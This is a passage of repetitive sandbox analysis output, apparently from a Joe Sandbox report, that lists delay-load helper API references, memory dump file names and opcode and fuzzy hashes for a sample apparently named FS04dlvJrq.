                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 19acba053df985c3f09e472bc950aff58a7e4f474b00c9e77513d6846ce9e0eb
                                                                                              • Instruction ID: cf9b264bccc38f14f1059e68cea4b3ca4a83b6bd4e9f94a749a504af545e5036
                                                                                              • Opcode Fuzzy Hash: 19acba053df985c3f09e472bc950aff58a7e4f474b00c9e77513d6846ce9e0eb
                                                                                              • Instruction Fuzzy Hash: 3AB012C235E1137C3204B1183E03D77014DC0C6B10731B51EF84CF54C1E4445C400271
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: dcd12c6559032e73305a72bb6ada1fdf8ceb8bc4afa9b7af80f6ed782a389171
                                                                                              • Instruction ID: 5e5ab82c3752c3a780525874ce6833384d2217bc4235c926c86da5dbd48353c4
                                                                                              • Opcode Fuzzy Hash: dcd12c6559032e73305a72bb6ada1fdf8ceb8bc4afa9b7af80f6ed782a389171
                                                                                              • Instruction Fuzzy Hash: 21B012D235D1136C3204B1183D03D77014CC4C6B10330B51EF44CF54D1E4445D800631
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 963a6646c3b7a98e62f7c740178c622acb3cb30ba233d9532aaccb501b2c7e91
                                                                                              • Instruction ID: 8f98541e9d82dbbc661e58939cb0d2d8ad04ba8de31a46467c6500ba355c2c9e
                                                                                              • Opcode Fuzzy Hash: 963a6646c3b7a98e62f7c740178c622acb3cb30ba233d9532aaccb501b2c7e91
                                                                                              • Instruction Fuzzy Hash: E9B012C236D1136C3308B1683D03D77014CD0C5B10330B91EF04CF55C1E4445C440231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: f7955d9501ef70e73e9d81efc0609a3cd3ec92ca68c1b869e2eb51e063fb5dfe
                                                                                              • Instruction ID: 75a4684c4f16d1ac65244c55c550a61a13aca5a638163baad7f2404bf3f61185
                                                                                              • Opcode Fuzzy Hash: f7955d9501ef70e73e9d81efc0609a3cd3ec92ca68c1b869e2eb51e063fb5dfe
                                                                                              • Instruction Fuzzy Hash: 8FB012D235D2136C3344B1183D03D77014CC0C5B10330761EF04CF54D1E4445DC00631
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: aad85a4b14ad25e247a549939dafdc2b7baa46b8df1fc54a4fb09dfacfc94668
                                                                                              • Instruction ID: 17616cd1156ccc8d058c7a920cc9b1e35cade92d697285752943c1858ceb389f
                                                                                              • Opcode Fuzzy Hash: aad85a4b14ad25e247a549939dafdc2b7baa46b8df1fc54a4fb09dfacfc94668
                                                                                              • Instruction Fuzzy Hash: 1CB092C226D1136C2208A5183D02D770148C0C6B10320B51AF44CE55C1A44458440231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 1cbf27201f1056ad672ef6a000d1e945a358807b70cf705733300e216208fbdf
                                                                                              • Instruction ID: ee96e55a389b538da5ccdbb58e9771b943039ea127eacf84ad1b219a78010c0b
                                                                                              • Opcode Fuzzy Hash: 1cbf27201f1056ad672ef6a000d1e945a358807b70cf705733300e216208fbdf
                                                                                              • Instruction Fuzzy Hash: 5EB012C236D1136C3308B1183E03D77014CC0C5B10330B55EF44CF55C1E4455D490231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 19d316db3c5db7de9d8c1cc4b6e0ce7e6caa64827354c1d17bece35361ae51ec
                                                                                              • Instruction ID: 2851919bc97541648ada0467ebe68d950a57b40ef66733a438fcddbe0c8ecb04
                                                                                              • Opcode Fuzzy Hash: 19d316db3c5db7de9d8c1cc4b6e0ce7e6caa64827354c1d17bece35361ae51ec
                                                                                              • Instruction Fuzzy Hash: C1B012C635D3136C3344B1583D03D77014CC0C5B10330761EF04CF55C2E4449C800231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 08720f7854d9738113d3dd3ac7c6cc1b76ffe1d55bf9b3cce6dda480fd3499b9
                                                                                              • Instruction ID: 690cb06ad7e0c57008a73df03911a1afa990a90def898b81aa4c30430efade3f
                                                                                              • Opcode Fuzzy Hash: 08720f7854d9738113d3dd3ac7c6cc1b76ffe1d55bf9b3cce6dda480fd3499b9
                                                                                              • Instruction Fuzzy Hash: 15B012C635D2136C3204B1583D03D77014CD0C5B10330751EF04CF55C2E4449C400331
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: d362b9b95f6e87496a8a5f36931ba0b631ea7c9982decd87ebf4f3801df32e2e
                                                                                              • Instruction ID: 87ac2ef808c97f6b0aafce61d8da03dcccb9a56c63cca95b1a2e2efdbdae8362
                                                                                              • Opcode Fuzzy Hash: d362b9b95f6e87496a8a5f36931ba0b631ea7c9982decd87ebf4f3801df32e2e
                                                                                              • Instruction Fuzzy Hash: 21B012C635D3136C3204B1583E03D77014CC0C5B10330755EF44CF55C2E4459E410231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: d181a77016e5b873943299132870f90f9f406e0ec896c9d07490760ec159edcd
                                                                                              • Instruction ID: 295460cdd138ecdcfe57281489b70a66faa597bbaa2e4b10d54e2c351d5d1a44
                                                                                              • Opcode Fuzzy Hash: d181a77016e5b873943299132870f90f9f406e0ec896c9d07490760ec159edcd
                                                                                              • Instruction Fuzzy Hash: C5B012C235D1136C3204B1187E03D77015CC0C5B10330775EF54CF54C1E4455D410231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: ccf6712a6305a60555a9ef571b16be4c521c3e05cfc8dfbd68eee787f4613917
                                                                                              • Instruction ID: 671a45131ff664c0d875b74a006b3e3c55d2b52b5ceb6a292dd9c8824a483645
                                                                                              • Opcode Fuzzy Hash: ccf6712a6305a60555a9ef571b16be4c521c3e05cfc8dfbd68eee787f4613917
                                                                                              • Instruction Fuzzy Hash: E5B012C235D2136C3344B1187D03D77015CC0C5B10330771EF14CF54C1E4445C800231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: a81fad7422da029134a09b3d90d4bd19ee640d000011aa4af65822f236844491
                                                                                              • Instruction ID: 0e9917c572d28201adc883ce2fac5b70543a4818ddb7c92f122c7c93660b935b
                                                                                              • Opcode Fuzzy Hash: a81fad7422da029134a09b3d90d4bd19ee640d000011aa4af65822f236844491
                                                                                              • Instruction Fuzzy Hash: 05B012C635D2136C3204B1583D03D77014CC0C6B10330B51EF44CF55C2E444AC400231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 9da9d7065c1f718e3d990dbc4e9acd52219c7b3064a4ef19e7b91ffc72d51c4b
                                                                                              • Instruction ID: 6e3d2742f4f71d326235fec959e175865510bdc2b6bb5cfb228b65bf99cd2eba
                                                                                              • Opcode Fuzzy Hash: 9da9d7065c1f718e3d990dbc4e9acd52219c7b3064a4ef19e7b91ffc72d51c4b
                                                                                              • Instruction Fuzzy Hash: 4FB012C236D2136C3204B1187D03D77015CD0C5B10330761FF14CF54C1E4445C400231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 4936df4361e5cf9ce47363adb3ca4ab63efe8cbe97e0a28e6e495f95b5976f42
                                                                                              • Instruction ID: 42ba7f706bcecd1d494cc84118292329a66d5e7684d1e46c81c38a505faa44e5
                                                                                              • Opcode Fuzzy Hash: 4936df4361e5cf9ce47363adb3ca4ab63efe8cbe97e0a28e6e495f95b5976f42
                                                                                              • Instruction Fuzzy Hash: A5B012D235D1137C320471143E03D77010CC0C1B10330759EF44CF44D2A8466D410131
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 0ca9b427f4981d22aabb2c04ede4b7ecc2704e0880337e72cc875fe3f8b50bbb
                                                                                              • Instruction ID: 3e9904b6c3adad6e5bc28787c3b690e1f4eba6584fc691ee1256d2003028f9e1
                                                                                              • Opcode Fuzzy Hash: 0ca9b427f4981d22aabb2c04ede4b7ecc2704e0880337e72cc875fe3f8b50bbb
                                                                                              • Instruction Fuzzy Hash: 09B012C235D1136C3214B1193D03D77014CC0C6B10330B92EF44CF98C1E4445C400231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 226a75081ce26f23f5966b74af185c554c71632798e6e77ca234cfd69f88e8dc
